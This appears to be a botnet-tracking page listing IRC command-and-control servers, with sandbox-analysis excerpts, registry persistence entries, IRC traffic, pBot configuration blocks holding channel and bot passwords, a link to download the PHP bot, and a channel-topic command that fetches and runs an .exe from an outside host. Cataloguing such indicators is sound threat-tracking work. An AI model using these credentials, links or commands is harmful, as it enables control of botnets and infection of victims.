mile.dbsarticles.com 205.234.222.37 * C&C Server: 205.234.222.37:2345 * Server Password: * Username: XP-0642 * Nickname: NEW-[DEU|00|P|85489] * Channel: #imb (Password: test) * Channeltopic: :.msn.stop|.msn.msg foto 😀 http://expensiveimages.com/image.php?= Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM35616.JPGwww.myspace.com.exe” = c:IM35616.JPGwww.myspace.com.exe:*:Enabled:Firewall Administrating HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “c:IM35616.JPGwww.myspace.com.exe” = C:WINDOWSinfocard.exe:*:Enabled:Firewall Administrating HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun “Firewall Administrating” = C:WINDOWSinfocard.exe HKEY_CURRENT_USERSoftwareMicrosoftWindowsCurrentVersionRun “Firewall Administrating” = C:WINDOWSinfocard.exeRead more...
server.beareserver1.com
Remote Host Port Number 204.0.5.34 80 204.0.5.41 80 204.0.5.49 80 204.0.5.51 80 204.0.5.58 80 216.178.38.103 80 216.178.38.168 80 63.135.86.30 80 63.135.86.39 80 64.210.61.214 80 64.202.120.57 2345 ircd here * The data identified by the following URLs was then requested from the remote web server: o http://1.download.advertise.myspace.com/upld/cs/1//cs4_lb_1705_.jpg o http://1.download.advertise.myspace.com/upld/cs/1//cs3_sk_3469_.jpg o http://x.myspacecdn.com/modules/common/static/css/global_dbasuqgy.css o http://x.myspacecdn.com/modules/common/static/css/uploadcontrol_ioe1imsn.css o http://x.myspacecdn.com/modules/browse/static/css/browse_qzzglnfy.css oRead more...
85.12.60.20
Remote Host Port Number 85.12.60.20 81 NICK n[USA|XP]5266080 USER n “” “lol” :n JOIN #control# PONG 422 PONG :request.not.found Other details * The following port was open in the system: Port Protocol Process 1053 TCP winvsnc.exe (%AppData%winvsnc.exe) Registry Modifications * The newly created Registry Value is: o [HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVersionRun] + WindowsUpdateControl = “%AppData%winvsnc.exe” so that winvsnc.exeRead more...
207.58.186.227(pBot)
var $config = array(“server”=>”207.58.186.227”, “port”=>7000, “pass”=>””, //senha do server “prefix”=>”[B]”, “maxrand”=>4, “chan”=>”#crack”, “key”=>”tow”, //senha do canal “modes”=>”+p”, “password”=>”la”, //senha do bot “trigger”=>”.”, “hostauth”=>”*” // * for any hostname here u can download this php bot: http://stashbox.org/866727/stla.txt
ktodumal.net(32k net)
ktodumal.net 85.12.60.20 C&C Server: 85.12.60.20:81 Server Password: Username: n Nickname: n[DEU|XP]0949985 Channel: #new# (Password: ) Channeltopic: :.im http://www.veyrandon-camions-magasins.fr/img/fotos.php?foto=IMG020407202010.JPG Now talking in #inf# Topic is ‘.dl http://veyrandon-camions-magasins.fr/admin/n.exe’ Set by s on Thu Apr 22 05:11:24 also chanel :#newgen# Registry Changes by all processes Create or Open Changes HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesSharedAccessParametersFirewallPolicyStandardProfileAuthorizedApplicationsList “C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe” = C:Dokumente und EinstellungenAdministratorAnwendungsdatenwinvsn.exe:*:Enabled:Windows ControlRead more...
class pBot
server”=>”218.226.193.174″, “port”=>4242, “pass”=>””, // “prefix”=>””, “maxrand”=>7, “chan”=>”##xp#”, “key”=>”142536”, // “modes”=>”-x+i”, “password”=>”stop”, // “trigger”=>”!say@”, “hostauth”=>”*” // *
MicrosoftUpdate.yi.org
[ DetectionInfo ] * Filename: C:analyzerscansvcnost.exe. * Sandbox name: W32/Backdoor. * Signature name: Ircbot.BAYQ. * Compressed: NO. * TLS hooks: NO. * Executable type: Application. * Executable file structure: OK. * Filetype: PE_I386. [ General information ] * File length: 73728 bytes. * MD5 hash: a9bfb1db9d131e1bcce5b8f1f3132871. * SHA1 hash: e7e8d1ce421b418a31180beb25a3e758265ea9c7. * Entry-point detection: Microsoft VisualRead more...
irc.x2.al
Server irc.x2.al [Berisha)] Connecting to 88.84.190.62 (4243) Modded by MrAnToN e-mail mranton@hotmail.de -Anton@Berisha.info
wmim.solutionofmsn.org
Remote Host Port Number wmim.solutionofmsn.org 1234 NICK {NEW}[USA][XP-SP2]074959 USER 1231 “” “lol” :1231 JOIN #b# NICK [USA][XP-SP2]339973 USER 0146 “” “lol” :0146 Other details * To mark the presence in the system, the following Mutex object was created: o kOiJjfhjtgK * The following port was open in the system: Port Protocol Process 1036 TCP msnms.exeRead more...
vunrestrained.dyndns.info
Remote Host Port Number vunrestrained.dyndns.info 51987 NICK Unrestrained-331897 USER ercmoxzx 0 0 :Unrestrained-331897 USERHOST Unrestrained-331897 MODE Unrestrained-331897 -x+B JOIN #Hydra# NICK Unrestrained-231953 USER ixuzpou 0 0 :Unrestrained-231953 USERHOST Unrestrained-231953 MODE Unrestrained-231953 -x+B NICK Unrestrained-465848 USER adwosov 0 0 :Unrestrained-465848 USERHOST Unrestrained-465848 MODE Unrestrained-465848 -x+B Other details * To mark the presence in the system, theRead more...